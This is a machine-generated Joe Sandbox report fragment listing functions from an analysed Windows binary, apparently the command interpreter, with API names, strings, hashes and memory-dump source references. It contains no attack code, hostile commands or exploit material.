                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$_wcslwr
                                      • String ID: [%s]
                                      • API String ID: 886762496-302437576
                                      • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                      • Instruction ID: e03b3456d91fb5cc6b021c94fbad4ae260e06f015dff1aae44c15bb7276830eb
                                      • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                      • Instruction Fuzzy Hash: FE315976705BC285EB61EB25D8503E9A7A0FB88B88F884135DA8D8B755EF3CE6458310
                                      Function 00007FF755CB32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB33A8: iswspace.MSVCRT(?,?,00000000,00007FF755CCD6EE,?,?,?,00007FF755CC0632), ref: 00007FF755CB33C0
                                      • iswspace.MSVCRT(?,?,?,00007FF755CB32A4), ref: 00007FF755CB331C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspace
                                      • String ID: off
                                      • API String ID: 2389812497-733764931
                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction ID: 003e8df3e1e5a76f5f506b14747cec06093b6e38b585308ec7815883466b07b5
                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction Fuzzy Hash: 782160ABE0C65381FB607B1A945427AE690EF45FA8FDCA234D94E47681DE2DEC418321
                                      Function 00007FF755CC9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: %s=%s$DPATH$PATH
                                      • API String ID: 3731854180-3148396303
                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction ID: c4fdd765b2e1f040bf6f1a3fe2525fb2297020acdc9872d76b99c0a780861842
                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction Fuzzy Hash: AE2192ABB0968780EE94AB55E440279A760AF84F88FCC6135C95E8B795DF6CE440C360
                                      Function 00007FF755CB8198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcscmp
                                      • String ID: *.*$????????.???
                                      • API String ID: 3392835482-3870530610
                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                      • Instruction ID: 4091dfc48e07deb4e09d0d26c8257658d8336a2e81ec6eddfd813a38c019bfe7
                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                      • Instruction Fuzzy Hash: 171182AAB14AA381EB64EF26A840539B2A1EB44F94FDC5031DE8D47B45DE7DE8418710
                                      Function 00007FF755CC9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: CMD Internal Error %s$%s$Null environment
                                      • API String ID: 383729395-2781220306
                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                      • Instruction ID: 8225d12b675947383725073c8228f5827448db5b0f9f5d4f4b49e00c401916b8
                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                      • Instruction Fuzzy Hash: 601191AB90868391EA55AB14E9410B9A261EB44FF8FC96331D67D472D4EF2CF481C350
                                      Function 00007FF755CB09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspacewcschr
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                      • API String ID: 287713880-1183017076
                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction ID: de6d9d6c4937d021cb9490cb91b12b1917679e74c13a4f9605baae08714b5cd2
                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction Fuzzy Hash: 5AF044E7A1A69391EA609B01A440176F690FF44F98BCD9535D95D52254EF2CFC40C720
                                      Function 00007FF755CB04F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                      • API String ID: 1646373207-2530943252
                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                      • Instruction ID: f53ee8544d132469c1f43afcd01084ac052a95d2dfce0dcac0aabf1fb1acc1ac
                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                      • Instruction Fuzzy Hash: C301E1EBE09E47D1EA84A711A891178A2A0EF45F38FCC4735C53E527E0DE7C79859324
                                      Function 00007FF755CC73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: RaiseFailFastException$kernelbase.dll
                                      • API String ID: 1646373207-919018592
                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                      • Instruction ID: e526e3d708a25b3387472599021001b698bf52af2f93beefdc962250e9aea62c
                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                      • Instruction Fuzzy Hash: 81F030A6618B82D2EA80AB12F544079EA60FF89FD4B889134D94D43B14CF3CD445C710
                                      Function 00007FF755CA1130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$CurrentDirectorytowupper
                                      • String ID:
                                      • API String ID: 1403193329-0
                                      • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                      • Instruction ID: 95bb95beaa5fde619c6277341a141b566359422610704f7667b5b28008bca925
                                      • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                      • Instruction Fuzzy Hash: 0861B0B7A087828AE760DB65D8402EDB7A4FB44B58FD84535DE9D07B99DF38D840C710
                                      Function 00007FF755CB4878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmp$wcschr
                                      • String ID:
                                      • API String ID: 3270668897-0
                                      • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                      • Instruction ID: 592f3169116476d14974cb779ae2d515d0ee9e35b48e0590ab44dd77d8d4f00a
                                      • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                      • Instruction Fuzzy Hash: 13516F9BE0C68381EB61BF219450179E3A1EF46FA8FDC9131CA5E472D5EE6CED418360
                                      Function 00007FF755CCF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveFullNamePathType
                                      • String ID:
                                      • API String ID: 3442494845-0
                                      • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                      • Instruction ID: d367bd5973a2f53c6551c68c1ac09d19a5f30abdd0370cd242e00376afa54a82
                                      • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                      • Instruction Fuzzy Hash: C2318A77615BC68AEB60DF20E8402E9B7A5FB88F88F884125EA4D47B54CF38D605C710
                                      Function 00007FF755CB8F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                      • String ID:
                                      • API String ID: 140117192-0
                                      • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                      • Instruction ID: bbd06355632b5148a19a90c0465547b2016858e4700cb4853bc6667297dd71f0
                                      • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                      • Instruction Fuzzy Hash: E541AAFAA18B8385EA90AB18F850365B3B4FB88B58FD85135D98D82764DF3DE444C720
                                      Function 00007FF755CB8470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcstol$lstrcmp
                                      • String ID:
                                      • API String ID: 3515581199-0
                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                      • Instruction ID: 9a77532e0ead7f067111185250422b0908b09b38d17e31c4d63258bc11ad6602
                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                      • Instruction Fuzzy Hash: A821D777A0864383F661AB7990A4139EBA0FB49F68FC95134CB4F42654CF6CE9448610
                                      Function 00007FF755CA4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$TimeWrite
                                      • String ID:
                                      • API String ID: 4019809305-0
                                      • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                      • Instruction ID: 0db4e410ff503c7ca5a04feee86e6a373e50b7a23d3260766b0f989028ecdf39
                                      • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                      • Instruction Fuzzy Hash: D031A46BA0868386E7A0AB54944033CE690BF49F58F9C6238DA5E47B95CF3CD8448610
                                      Function 00007FF755CD1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveNamePathTypeVolume
                                      • String ID:
                                      • API String ID: 1029679093-0
                                      • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                      • Instruction ID: a29ddc7179d17f8c05c375e7579880cc26b848e257c3324df7dd7a76cd4194d8
                                      • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                      • Instruction Fuzzy Hash: 9C312977705AC28AEB609F21D8543E8A7A4FB89F88F884135DA4D87B48DF3CD645C750
                                      Function 00007FF755CCE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                      • String ID:
                                      • API String ID: 2448200120-0
                                      • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                      • Instruction ID: caeea36fed782348529c9b5b5fe81e9014f452b305577d59e03f0856fbfd8d88
                                      • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                      • Instruction Fuzzy Hash: CD214CBBA0874386E656BB11A40017DF6A1FB86F99F885139E91E47795CF3CE841CB20
                                      Function 00007FF755CB7CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                      • Instruction ID: d592d9c6575427809955092a3a289cbfbfbd50ea1cff67ffa042d4c5b1886e6d
                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                      • Instruction Fuzzy Hash: 852179AAB08B4385E944AB61A510079F7A1FF49FD4BDD9130DE1E47795DF3CE4418720
                                      Function 00007FF755CA6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB3D0C
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D2F
                                        • Part of subcall function 00007FF755CB3C24: iswalpha.MSVCRT ref: 00007FF755CB3D4F
                                        • Part of subcall function 00007FF755CB3C24: towupper.MSVCRT ref: 00007FF755CB3D75
                                        • Part of subcall function 00007FF755CB3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3DBF
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CA6ABF
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CA6AD3
                                        • Part of subcall function 00007FF755CA6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF755CA6AE8,?,?,?,00007FF755CCEA0F,?,?,?,00007FF755CCE925), ref: 00007FF755CA6B8B
